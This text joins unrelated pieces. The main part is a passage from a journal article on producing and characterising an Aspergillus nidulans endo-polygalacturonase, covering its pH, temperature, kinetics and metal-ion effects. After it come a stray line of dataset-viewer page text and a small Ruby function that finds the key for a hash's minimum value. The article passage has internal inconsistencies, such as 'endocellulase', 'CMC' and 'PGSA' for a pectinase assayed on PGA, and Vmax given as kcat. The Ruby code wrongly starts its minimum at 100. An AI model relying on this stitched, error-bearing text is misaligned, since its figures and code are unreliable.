Structural models of AnEPG based on homologous enzymes were obtained by the I-TASSER server \[[@B32-ijms-21-02100]\]. Five top ranking 3D models were generated. Each model was validated based on C-score (confidence score), TM-score (template modeling score), RMSD (the root-mean-square deviation), and cluster density. In general, models with C-score \> −1.5 have a correct fold \[[@B32-ijms-21-02100]\]. Model 1 had the highest C-score (1.69) value reflecting a model of better quality (TM-score = 0.95 ± 0.05 and RMSD = 3.1 ± 2.2 Å) ([Figure 1](#ijms-21-02100-f001){ref-type="fig"}). Similarly to homologous GH28 endo-PGs \[[@B30-ijms-21-02100],[@B31-ijms-21-02100],[@B33-ijms-21-02100]\], the predicted three-dimensional structure of AnEPG was a right handed parallel β-helix with 12 (10 complete) turns, in which the β-strands were separated by turns that consisted of either a sharp bend or a loop ([Figure 1](#ijms-21-02100-f001){ref-type="fig"}). Based on structural and sequence alignment of AnEPG and AaEPG from *Aspergillus aculeatus* and pga II from *Aspergillus niger*, residues Asp194, Asp215, Asp216, and His237 of AnEPG, which are the equivalent of Asp159, Asp180, Asp181, and His202 of AaEPG, and Asp180, Asp201, Asp202, and His223 of pga II, were predicted to be involved in catalysis ([Figure 1](#ijms-21-02100-f001){ref-type="fig"}) ([Figure S1, Supplemental files](#app1-ijms-21-02100){ref-type="app"}) \[[@B30-ijms-21-02100],[@B33-ijms-21-02100]\].
2.2. Overexpression of AnEPG in P. pastoris {#sec2dot2-ijms-21-02100}
-------------------------------------------
AnEPG overexpressed in *P. pastoris* X-33 was first produced in flasks. AnEPG was induced with 0.5% methanol. The protein expression level increased with the induction time, and 96-h induction gave the highest protein expression yield ([Figure S3, Supplemental files](#app1-ijms-21-02100){ref-type="app"}). A band corresponding to 75 kDa was observed, which was much higher than the predicted molecular weight of AnEPG (around 42 kDa) ([Figure S3, Supplemental files](#app1-ijms-21-02100){ref-type="app"}). The difference between the predicted molecular weight and the apparent one on SDS PAGE for AnEPG was possibly due to the fact that highly glycosylated proteins are usually obtained when they are overexpressed in *P. pastoris* \[[@B34-ijms-21-02100]\]. The identity of AnEPG was also confirmed by enzymatic hydrolysis of PGA (polygalacturonic acid) with specific activity of 3268.6 U/mg. AnEPG exhibited much higher specific activity against PGA than endo-PG I from *Penicillium* sp. CGMCC 1669 (815.5 U/mg) \[[@B18-ijms-21-02100]\], endo-PGA1 from *Bispora* sp. MEY-1 (1520 U/mg) \[[@B21-ijms-21-02100]\], and AaEPG from *Aspergillus aculeatus* (1892 U/mg) \[[@B15-ijms-21-02100]\], and greatly lower than Nfpg II from *Neosartorya fischeri* P1 (11,793 U/mg) \[[@B20-ijms-21-02100]\], endo-TePG28b from *Talaromyces leycettanus* (25,900 U/mg) \[[@B23-ijms-21-02100]\], PG I from *Achaetomium* sp. Xz8 (28,122 U/mg) \[[@B22-ijms-21-02100]\], PG2 from *Penicillium occitanis* (31,397.3 U/mg) \[[@B19-ijms-21-02100]\], endo- PG7fn from *Thielavia arenaria* XZ7 (34,382 U/mg) \[[@B24-ijms-21-02100]\], and Nfpg I from *Neosartorya fischeri* P1 (40,123 U/mg) \[[@B20-ijms-21-02100]\].
2.3. Determination of pH Optima and pH Stability of AnEPG {#sec2dot3-ijms-21-02100}
---------------------------------------------------------
As shown in [Figure 2](#ijms-21-02100-f002){ref-type="fig"}, AnEPG showed the highest activity at pH 4.0, and no obvious activities were detected above pH 6.0. The enzyme was active in a narrow pH range (pH 2.0--5.0), and retained \>54.1% of maximum activity between this pH range. Thus, AnEPG was classified as acidic endocellulases. It appears that many endo-polygalacturonases belonged to acidic ones with optimal pH values around 3.5--6.0, including endo-TePG28b (pH 3.5) \[[@B23-ijms-21-02100]\], endo-PGA1 (pH 3.5) \[[@B21-ijms-21-02100]\], endo-PG I (pH 3.5) \[[@B18-ijms-21-02100]\], Nfpg II (pH 4.0) \[[@B20-ijms-21-02100]\], PGA-ZJ5A from *Aspergillus niger* ZJ5 (pH 4.5) \[[@B12-ijms-21-02100]\], PG7fn (pH 5.0) \[[@B24-ijms-21-02100]\], AaEPG (pH 5.0) \[[@B15-ijms-21-02100]\], Nfpg I (pH 5.0) \[[@B20-ijms-21-02100]\], endo-PG I (pH 6.0) \[[@B22-ijms-21-02100]\], and PG2 (pH 6.0) \[[@B19-ijms-21-02100]\]. Only several endo-polygalacturonases were classified as alkaline, such as Endo-PG from *Aspergillus fumigatus* MTCC 2584 with optimal pH 10.0 \[[@B35-ijms-21-02100]\].
The pH stability of AnEPG was also investigated ([Figure 3](#ijms-21-02100-f003){ref-type="fig"}). Notably, AnEPG was stable between pH 2.0 and pH 12.0, retaining more than 62.7% of original activity after 120 h. In comparison with other endo-polygalacturonases, it showed superior stability over a wide pH range, whereas others exhibited high stability only over a narrow pH range, such as Nfpg I (pH 5.0--7.0) \[[@B20-ijms-21-02100]\], AaEPG (pH 2.0--6.0) \[[@B15-ijms-21-02100]\], PGA-ZJ5A (pH 2.0--6.0) \[[@B12-ijms-21-02100]\], Nfpg II (pH 2.0--6.0) \[[@B20-ijms-21-02100]\], endo-PG I (pH 2.0--6.0) \[[@B18-ijms-21-02100]\], endo-PG I (pH 3.5--8.0) \[[@B22-ijms-21-02100]\], endo-TePG28b (pH 2.0--7.0) \[[@B23-ijms-21-02100]\], endo-PGA1 (pH 2.0--7.0) \[[@B21-ijms-21-02100]\], PG7fn (pH 3.0--8.0 ) \[[@B24-ijms-21-02100]\], and PG2 (pH 4.0--9.0) \[[@B19-ijms-21-02100]\].
2.4. Determination of Optimal Temperature and Thermal Stability of AnEPG {#sec2dot4-ijms-21-02100}
------------------------------------------------------------------------
The optimal temperature of AnEPG was determined to be 60 °C, and retained \> 51.0% of maximum activity between 30 and 80 °C. At 20 °C, it maintained 42.2% of maximum activity. Most characterized endo-polygalacturonases belonged to mesophilic ones with optimal activities at around 35--50 °C, including PG2 (35 °C) \[[@B19-ijms-21-02100]\], endo-PG I (40 °C) \[[@B18-ijms-21-02100]\], PGA-ZJ5A (40 °C) \[[@B12-ijms-21-02100]\], endo-PG I (45 °C) \[[@B22-ijms-21-02100]\], and AaEPG (50 °C) \[[@B15-ijms-21-02100]\]. In contrast, some other endo-polygalacturonases, like AnEPG, exhibited optimal activities at ≥55 °C, for example, endo-PGA1 (55 °C) \[[@B21-ijms-21-02100]\], AnEPG (60 °C), PG7fn (60 °C) \[[@B24-ijms-21-02100]\], Nfpg II (65 °C) \[[@B20-ijms-21-02100]\], and endo-TePG28b (70 °C) \[[@B23-ijms-21-02100]\].
The thermal stability of AnEPG was studied after being pre-incubated for a fixed time at pH 6.0, and at 30, 40, and 50 °C, respectively ([Figure 4](#ijms-21-02100-f004){ref-type="fig"}). AnEPG was stable at 30 °C, and lost only 11.5% of original activity after 120 min. It retained 80.7% of initial activity at 40 °C after 120 min. However, it was completely inactivated at 50 °C after 120 min, and retained only 39.1% of original activity at 50 °C after 15 min. Therefore, AnEPG was thermally stable to some extent. Just like AnEPG, many endo-polygalacturonases were stable at ≤40 °C, such as PG2 (≤35 °C) \[[@B19-ijms-21-02100]\], endo-PG I (≤40 °C) \[[@B18-ijms-21-02100]\], PGA-ZJ5A (≤40 °C) \[[@B12-ijms-21-02100]\], AaEPG (≤40 °C) \[[@B15-ijms-21-02100]\], and endo-PG I (≤45 °C) \[[@B22-ijms-21-02100]\]. In comparison, some endo-polygalacturonases, including PG7fn (≤50 °C) \[[@B24-ijms-21-02100]\], endo-PGA1 (≤55 °C) \[[@B21-ijms-21-02100]\], endo-TePG28b (≤60 °C) \[[@B23-ijms-21-02100]\], and Nfpg II (≤60 °C) \[[@B20-ijms-21-02100]\], exhibited superior thermal stability at ≥50 °C.
2.5. Determination of Kinetic Parameters of AnEPG {#sec2dot5-ijms-21-02100}
-------------------------------------------------
The kinetic parameters of recombinant AnEPG against CMC were determined. Since saturation was not achieved even when high PGA concentrations were used, the deduced kinetic parameters were apparent ([Figure 5](#ijms-21-02100-f005){ref-type="fig"}). The apparent *K~m~* and *V~max~* values of AnEPG towards PGSA were 8.3 ± 2.2 mg/mL and 5640 ± 300 μmol/min/mg, respectively.
In comparison with the kinetic parameters of other endo-polygalacturonases, the apparent *K~m~* value of AnEPG is much lower than that of endo-PG I (19.5 mg/mL) and AaEPG (15.1 mg/mL), showing higher binding affinity towards PGA than endo-PG I and AaEPG. However, its apparent *K~m~* value is significantly higher than that of other endo-polygalacturonases such as endo-PG I (0.32 mg/mL), Nfpg II (0.5 mg/mL), PGA-ZJ5A (0.85 mg/mL), endo-TePG28b (1.2 mg/mL), endo-PGA1 (1.25 mg/mL), and PG7fn (2.0 mg/mL), demonstrating lower binding affinity of AnEPG towards PGA than these endo-polygalacturonases. Though AnEPG showed a much higher apparent *V~ma~*~x~ value than endo-PGA1 (1.25 mg/mL, 2526 U/min/mg), endo-PG I (909.1 U/min/mg), and PGA-ZJ5A (1.87 μmol/min/mg), its apparent *V~max~* value was significantly lower than that of endo-PG I (97,951 μmol/min/mg), endo-TePG28b (63,694 μmol/min/mg), PG7fn (32,000 μmol/min/mg), and Nfpg II (15,053 μmol/min/mg).
According to the modelled structure of the AaEPG-octagalacturonate complex \[[@B33-ijms-21-02100]\], 17 residues, which are possibly involved in interaction with substrate, were identified, including Lys105, His110, Gln128, Asp150, His156, Asn157, Asp162, Asp180, Asn186, Ser208, His202, Arg212, Asp231, Arg235, Lys237, Lys61, Tyr270. Based on sequence and structural alignment of AaEPG (PDB ID: 1IA5) and modelled AnEPG, 15 residues are completely conserved, and only two residues Asp231 and Lys261 of AaEPG, corresponding to Val266 and Asp296 of AnEPG, are not conserved. The difference between these two residues might lead to different *K~m~* values of AnEPG and AaEPG, which needs further investigation.
2.6. Effects of Divalent Metal Ions on Enzyme Activity {#sec2dot6-ijms-21-02100}
------------------------------------------------------
The effects of divalent metal ions on AnEPG activity were examined ([Figure 6](#ijms-21-02100-f006){ref-type="fig"}). Ba^2+^ and Ni^2+^ upregulated the pectinolytic activity of AnEPG by 12.2% and 9.4%, respectively, while Ca^2+^, Cu^2+^ and Mn^2+^ decreased the activity of AnEPG by 14.8%, 12.8%, and 10.2% separately. Other divalent metal ions did not show an obvious influence on the catalytic activity of AnEPG.
Combining our results with the published ones, it seems that some divalent metal ions had a different impact on endo-polygalacturonases from different microorganisms ([Table S1, Supplemental files](#app1-ijms-21-02100){ref-type="app"}). For instance, Ni^2+^ interfered with the activities of endo-PG I \[[@B18-ijms-21-02100]\], Nfpg II \[[@B20-ijms-21-02100]\], and PGA-ZJ5A \[[@B12-ijms-21-02100]\], and did not have any effects on endo-PGA1 \[[@B21-ijms-21-02100]\], PG7fn \[[@B24-ijms-21-02100]\], and endo-PG I \[[@B22-ijms-21-02100]\]. However, it enhanced the activity of AnEPG. Ba^2+^ showed an inhibitory impact on PG2 \[[@B19-ijms-21-02100]\], whereas it upregulated the activity of AnEPG. Ca^2+^ reduced the activities of endo-PGA1 \[[@B21-ijms-21-02100]\], endo-PG I \[[@B18-ijms-21-02100]\], Nfpg II \[[@B20-ijms-21-02100]\], PGA-ZJ5A \[[@B12-ijms-21-02100]\], PG7fn \[[@B24-ijms-21-02100]\], endo-PG I \[[@B22-ijms-21-02100]\], and AnEPG, while it did not impact AaEPG \[[@B15-ijms-21-02100]\] and PG2 \[[@B19-ijms-21-02100]\]. Cu^2+^ inhibited endo-PGA1 \[[@B21-ijms-21-02100]\], endo-PG I \[[@B18-ijms-21-02100]\], Nfpg II \[[@B20-ijms-21-02100]\], endo-PG I \[[@B22-ijms-21-02100]\], PG2 \[[@B19-ijms-21-02100]\], and AnEPG, and it did not exhibit any influence on PG7fn \[[@B24-ijms-21-02100]\]. However, Cu^2+^ activated AaEPG \[[@B15-ijms-21-02100]\]. Mn^2+^ acted as an inhibitor of endo-PG I \[[@B18-ijms-21-02100]\], PGA-ZJ5A \[[@B12-ijms-21-02100]\], AaEPG \[[@B15-ijms-21-02100]\], PG2 \[[@B19-ijms-21-02100]\], and AnEPG, and as an activator of endo-PGA1 \[[@B21-ijms-21-02100]\], and did not impact Nfpg II \[[@B20-ijms-21-02100]\] and PG7fn \[[@B24-ijms-21-02100]\]. Zn^2+^ displayed an inhibitory effect on endo-PGA1 \[[@B21-ijms-21-02100]\], endo-PG I \[[@B18-ijms-21-02100]\], Nfpg II \[[@B20-ijms-21-02100]\], PGA-ZJ5A \[[@B12-ijms-21-02100]\], and AaEPG \[[@B15-ijms-21-02100]\], while it did not influence PG7fn \[[@B24-ijms-21-02100]\], endo-PG I \[[@B22-ijms-21-02100]\], and AnEPG. Co^2+^ inhibited endo-PG I \[[@B18-ijms-21-02100]\], PGA-ZJ5A \[[@B12-ijms-21-02100]\], and PG2 \[[@B19-ijms-21-02100]\], and activated Nfpg II \[[@B20-ijms-21-02100]\], and did not affect endo-PGA1 \[[@B21-ijms-21-02100]\], PG7fn \[[@B24-ijms-21-02100]\], endo-PG I \[[@B22-ijms-21-02100]\], and AnEPG. Mg^2+^ acted as an inhibitor of Nfpg II \[[@B20-ijms-21-02100]\], PGA-ZJ5A \[[@B12-ijms-21-02100]\], and endo-PG I \[[@B22-ijms-21-02100]\], and acted as an activator of PG \[[@B19-ijms-21-02100]\], and did not show any influence on endo-PGA1 \[[@B21-ijms-21-02100]\], endo-PG I \[[@B18-ijms-21-02100]\], PG7fn \[[@B24-ijms-21-02100]\], AaEPG \[[@B15-ijms-21-02100]\], and AnEPG. Fe^2+^ displayed a stimulatory effect on AaEPG \[[@B15-ijms-21-02100]\], whereas it inhibited PG2 \[[@B19-ijms-21-02100]\]. By contrast, it did not influence PGA-ZJ5A \[[@B12-ijms-21-02100]\] and AnEPG.
2.7. Analysis of Hydrolysis Products of PGA by AnEPG {#sec2dot7-ijms-21-02100}
----------------------------------------------------
TLC (thin-layer chromatography) analysis of the soluble sugars released from PGA by AnEPG indicated that digalacturonate and other oligogalacturonates were produced at the initial stage (20 min) and accumulated as hydrolysis continued ([Figure 7](#ijms-21-02100-f007){ref-type="fig"}). The monomer galacturonate was observed after 3 h. The presence of galacturonate released from oligogalacturonates by AnEPG suggested that it was a typical endo-acting enzyme, which preferentially cleaved the internal glycosidic bonds of oligogalacturonates and pectin/pectate.
3. Materials and Methods {#sec3-ijms-21-02100}
========================
3.1. Materials {#sec3dot1-ijms-21-02100}
--------------
Chemicals were from Sigma, Merck or Ameresco. *Pichia pastoris* X-33 overexpressing the endo-α-1,4-endopolygalacturonase gene (GeneBank accession number AN8327.2) from *Aspergillus nidulans* was purchased from FGSC (Fungal Genetics Stock Center, Manhattan, KS, USA).
3.2. Bacterial Strains, Plasmids, and Media {#sec3dot2-ijms-21-02100}
-------------------------------------------
*P. pastoris* X-33 was grown in YPD (yeast extract peptone dextrose) medium (1% yeast extract, 2% peptone, and 2% glucose) at 30 °C or on YPD supplemented with 1.5% (*w*/*v*) agar. For AnEPG overexpression, *P. pastoris* X-33 was first grown overnight in BMGY (buffered complex glycerol medium) (1% yeast extract, 2% peptone, 1% glycerol, 1.34% YNB, 4 × 10^-5^ g/L biotin, and 0.1 M potassium phosphate buffer, pH 6.0), then in BMMY (buffered complex methanol medium) (1% yeast extract, 2% peptone, 1% methanol, 1.34 % YNB, 4 × 10^-5^ g/L biotin, and 0.1 M potassium phosphate buffer, pH 6.0) for a couple of days.
3.3. Protein Overexpression {#sec3dot3-ijms-21-02100}
---------------------------
Protein expression was induced with 0.5% (*v*/*v*) methanol in baffled flasks (100 ml BMMY) for four days. The supernatants were precipitated with 80% (NH~4~)~2~SO~4~, and the precipitated proteins were redissolved in buffer A (50 mM Tris/HCl, pH 8.0, 0.5 M NaCl). The protein concentration was determined by the Bradford method using bovine serum albumin as a standard.
3.4. Enzyme Activity Assay {#sec3dot4-ijms-21-02100}
--------------------------
All enzyme assays were done in triplicate. Endo-α-1,4-polygalacturonase activity was determined by measuring the amount of reducing sugars released from PGA (polygalacturonic acid) through the DNS (3,5-dinitrosalicylic acid) method \[[@B36-ijms-21-02100]\]. D-(+)-galacturonic acid was used as a standard. Enzymatic reactions were performed in the presence of 0.5% PGA (*w*/*v*) in 50 mM B & R (Britton and Robinson) buffer at 37 °C for 15 min. One unit (U) of endo-α-1,4-polygalacturonase activity toward PGA was defined as the amount of protein required to release 1 μmol of reducing sugar per min under standard assay conditions, and specific activity was defined as units mg^-1^ protein.
3.5. Determination of Optimal pH and pH Stability {#sec3dot5-ijms-21-02100}
-------------------------------------------------
The optimal pH of AnEPG was determined in 50 mM B & R buffer at 37 °C and pH between 2.0 and 12.0, and all enzymatic reactions were incubated for 15 min. The pH stability was estimated by first preincubating PGA in 50 mM B&R buffer at different pH values (pH 2.0 -- 12.0) at 4 °C for 2, 24, and 120 h respectively. The residual activities were then determined at 37 °C and optimal pH, and the percentage of the residual activity at different time points and pH values against the initial one was calculated.
3.6. Determination of Optimal Temperature and Thermal Stability {#sec3dot6-ijms-21-02100}
---------------------------------------------------------------
The optimal temperature of AnEPG was determined in 50 mM B & R buffer (pH 4.0) between 20 and 80 °C, and all enzymatic reactions were incubated for 15 min. To determine the thermal stability of AnEPG, it was pre-incubated for varied time intervals (15 min to 2 h) at pH 6.0, and 30, 40, and 50 °C, respectively. The residual activities were measured at 37 °C and optimal pH, and the percentage of the residual activity at different time points and temperatures against the original one was calculated.
3.7. Determination of Kinetic Parameters {#sec3dot7-ijms-21-02100}
----------------------------------------
Endo-α-1,4-polygalacturonase activity was measured at 37 °C using PGA as substrate at concentrations ranging from 0.2% to 2% (*w*/*v*) in 50 mM B & R buffer (optimal pH). The release of reducing sugars was quantified after being incubated for 5 min, and kinetic parameters were determined based on the Michaelis--Menten equation.
3.8. Effects of Divalent Metal Ions on Enzyme Activity {#sec3dot8-ijms-21-02100}
------------------------------------------------------
The effects of divalent metal ions on the catalytic activity of AnEPG were determined in the presence of various divalent metals (Pb(CH~3~COO)~2~, NiSO~4~, MnSO~4~, CuSO~4~, BaCl~2~, ZnSO~4~, CoCl~2~, CaCl~2~, MgCl~2~, and FeSO~4~). Since phosphate in B & R buffer may interfere with the enzyme assay, 100 mM sodium acetate (optimal pH) was used. The percentage of the activity in the presence of different divalent metal ions against the control without metal ions was calculated.
3.9. Thin Layer Chromatography Analysis of Hydrolysis Products of PGA by AnEPG {#sec3dot9-ijms-21-02100}
------------------------------------------------------------------------------
To demonstrate the mode of action of AnEPG, hydrolysis of PGA (0.5%) by AnEPG (0.89 μg/mL) was carried out in 50 mM B & R buffer (optimal pH) at 37 °C for 5 min, 10 min, 20 min, 30 min, 1 h, 2 h, 3 h, and 24 h, respectively, and a control in the absence of AnEPG was also set up. The hydrolysis products of PGA by AnEPG were analyzed by TLC (thin-layer chromatography). Samples were spotted on the silica gel plate and the TLC plate was placed in the mixture (butan-1-ol:acetic acid:water (9:4:7 (*v*/*v*) as the mobile phase \[[@B19-ijms-21-02100]\]. At the end of migration, products were visualized by heating at 105°C for 5 min after spraying the plates with 10% sulfuric acid.
3.10. Sequence Analysis {#sec3dot10-ijms-21-02100}
-----------------------
The homologous sequences were searched using the BLAST online server (<http://blast.ncbi.nlm.nih.gov/Blast.cgi>). Multiple sequence alignment was performed by Clustal Omega (<https://www.ebi.ac.uk/Tools/msa/clustalo/>). A phylogenetic tree was constructed from multiple alignment of AnEPG and other GH 28 endo-PGs through MEGA6. For multiple sequence alignment and phylogenetic analysis, sequences included were derived from *A. nidulans* (AnEPG, GeneBank accession number AN8327.2), *Aspergillus niger* (pgaII, GenBank accession no. CAA41694) \[[@B30-ijms-21-02100]\], *Aspergillus aculeatus* (AaEPG, GenBank accession no. AC23565) \[[@B15-ijms-21-02100]\], *Colletotrichum lupini var. setosum* (CluPG1, GenBank accession no ABL01533) \[[@B31-ijms-21-02100]\], *Achaetomium* sp. Xz8 (PG I, GenBank accession no. AGR51994) \[[@B22-ijms-21-02100]\], *Thielavia arenaria* XZ7 (endo-PG7fn, GenBank accession no. AIZ95162) \[[@B24-ijms-21-02100]\], *Penicillium oxalicum* CZ1028 (EPG4, GenBank accession no. APZ75903.1) \[[@B17-ijms-21-02100]\], *Aspergillus mulundensis* (hypothetical protein, GenBank accession no. XP_026600476.1), *Aspergillus calidoustus* (putative glycoside hydrolase family 28, GenBank accession no. CEN62944.1), *Penicillium antarcticum* (hypothetical protein, GenBank accession no. OQD89725.1). The signal peptide was predicted using the SignalP 4.1 Server (<http://www.cbs.dtu.dk/services/SignalP/>). The potential N- and O-glycosylation sites were predicted online (<http://www.cbs.dtu.dk/services/NetNGlyc/>, http://[www.cbs.dtu.dk/services/NetOGlyc/](www.cbs.dtu.dk/services/NetOGlyc/)).
3.11. Structure Modelling of AnEPG {#sec3dot11-ijms-21-02100}
----------------------------------
Modelling was performed by using I-TASSER \[[@B32-ijms-21-02100]\], and three enzymes were used as templates, including endo-polygalacturonase from *Aspergillus aculeatus* (PDB ID: 1IA5 and 1IB4) \[[@B33-ijms-21-02100]\], endo-polygalacturonase II from *Aspergillus niger* (PDB ID: 1CZF) \[[@B30-ijms-21-02100]\], and endo-polygalacturonase from *Colleotrichum lupini* (PDB ID: 2IQ7) \[[@B31-ijms-21-02100]\].
4. Conclusions {#sec4-ijms-21-02100}
==============
This newly characterized endo-polygalacturonases from *A. nidulans* exhibited moderate activity under acidic conditions and good stability over a wide range of pH and below 40 °C. This pectinase has great potential to be used in the fields where acidic endo-polygalacturonases are required.
In summary, multiple sequence alignment and phylogenetic analysis of AnEPG and homologous GH 28 endo-PGs suggested that AnEPG is a new endo-polygalacturonase. AnEPG was overexpressed in *Pichia pastoris* and characterized in detail. AnEPG showed the highest activity at pH 4.0 and 60 °C. It was very stable between pH 2.0 and pH 12.0. AnEPG exhibited high stability below 40 °C and was unstable above 50 °C. The apparent *K~m~* and *k~cat~* values of AnEPG against PGA (polygalacturonic acid) were 8.3 mg/mL and 5640 μmol/min/mg respectively. Ba^2+^ and Ni^2+^ showed some stimulatory effects on AnEPG, while AnEPG was inhibited by Ca^2+^, Cu^2+^, and Mn^2+^. The structural characteristics of endo-polygalacturonases were demonstrated by structure modelling of AnEPG. This pectinase could be potentially used in the beverage industry and/or other fields requiring acidic endo-polygalacturonases.
Supplementary materials can be found at <https://www.mdpi.com/1422-0067/21/6/2100/s1>.
######
Click here for additional data file.
J.-J.L., Z.L. (Zhimin Li) and Y.D. designed the experiments. H.X., P.Z., Y.Z. and Z.L. (Zebin Liu) performed the experiments, including sequence analysis, overexpression, characterization, and enzymatic assays. X.Z. performed review and editing. J.-J.L. drafted the manuscript. All authors read and approved the final manuscript.
We are grateful to the National Key Research and Development Program of China (2017YFD0200902) and National Natural Science Foundation of China (31370799) for the financial support.
The authors declare no conflict of interest.
AnEPG
endo-α-1,4-polygalacturonase from
Aspergillus nidulans
PGA
polygalacturonic acid
HG
homogalacturonan
CAZy
carbohydrate-active enzymes database
ORFs
open reading frames
C-score
confidence score
TM-score
template modeling score
RMSD
the root-mean-square deviation
CMC
Carboxymethyl Cellulose
FGSC
Fungal Genetics Stock Center
YPD
yeast extract peptone dextrose
BMGY
buffered complex glycerol medium
BMMY
buffered complex methanol medium
DNS
3,5-dinitrosalicylic acid
TLC
thin-layer chromatography
![Structure modelling of AnEPG. Superimposition of structures of modelled AnEPG (red) and AaEPG (PDB ID: 1IA5) (green) \[[@B33-ijms-21-02100]\]. The amino acid sequence identity between AnEPG and AaEPG was 57.8%.](ijms-21-02100-g001){#ijms-21-02100-f001}
{#ijms-21-02100-f002}
{#ijms-21-02100-f003}
{#ijms-21-02100-f004}
{#ijms-21-02100-f005}
{#ijms-21-02100-f006}
{#ijms-21-02100-f007}
| mini_pile | {'original_id': '68226e5f6f33f6c91bb9763aa5137a06afbd5c03e75ccff448fc1a41292f13e8'} |
# prereqs: iterators, hashes, conditional logic
# Given a hash with numeric values, return the key for the smallest value
def key_for_min_value(name_hash)
smallest_value = 100
name_hash.each do |key, value|
if value < smallest_value
smallest_value = value
end
end
name_hash.key(smallest_value)
end | common_corpus | {'identifier': 'https://github.com/goodjobbin85/key-for-min-value-online-web-pt-120919/blob/master/key_for_min.rb', 'collection': 'Github Open Source', 'open_type': 'Open Source', 'license': 'LicenseRef-scancode-unknown-license-reference, LicenseRef-scancode-public-domain', 'date': '2019.0', 'title': 'key-for-min-value-online-web-pt-120919', 'creator': 'goodjobbin85', 'language': 'Ruby', 'language_type': 'Code', 'word_count': '40', 'token_count': '102', '__index_level_0__': '17962', 'original_id': '582ce5f0b31f9b0e085495b907b56dfd70389178101333ac8bcb5943d0674c7d'} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.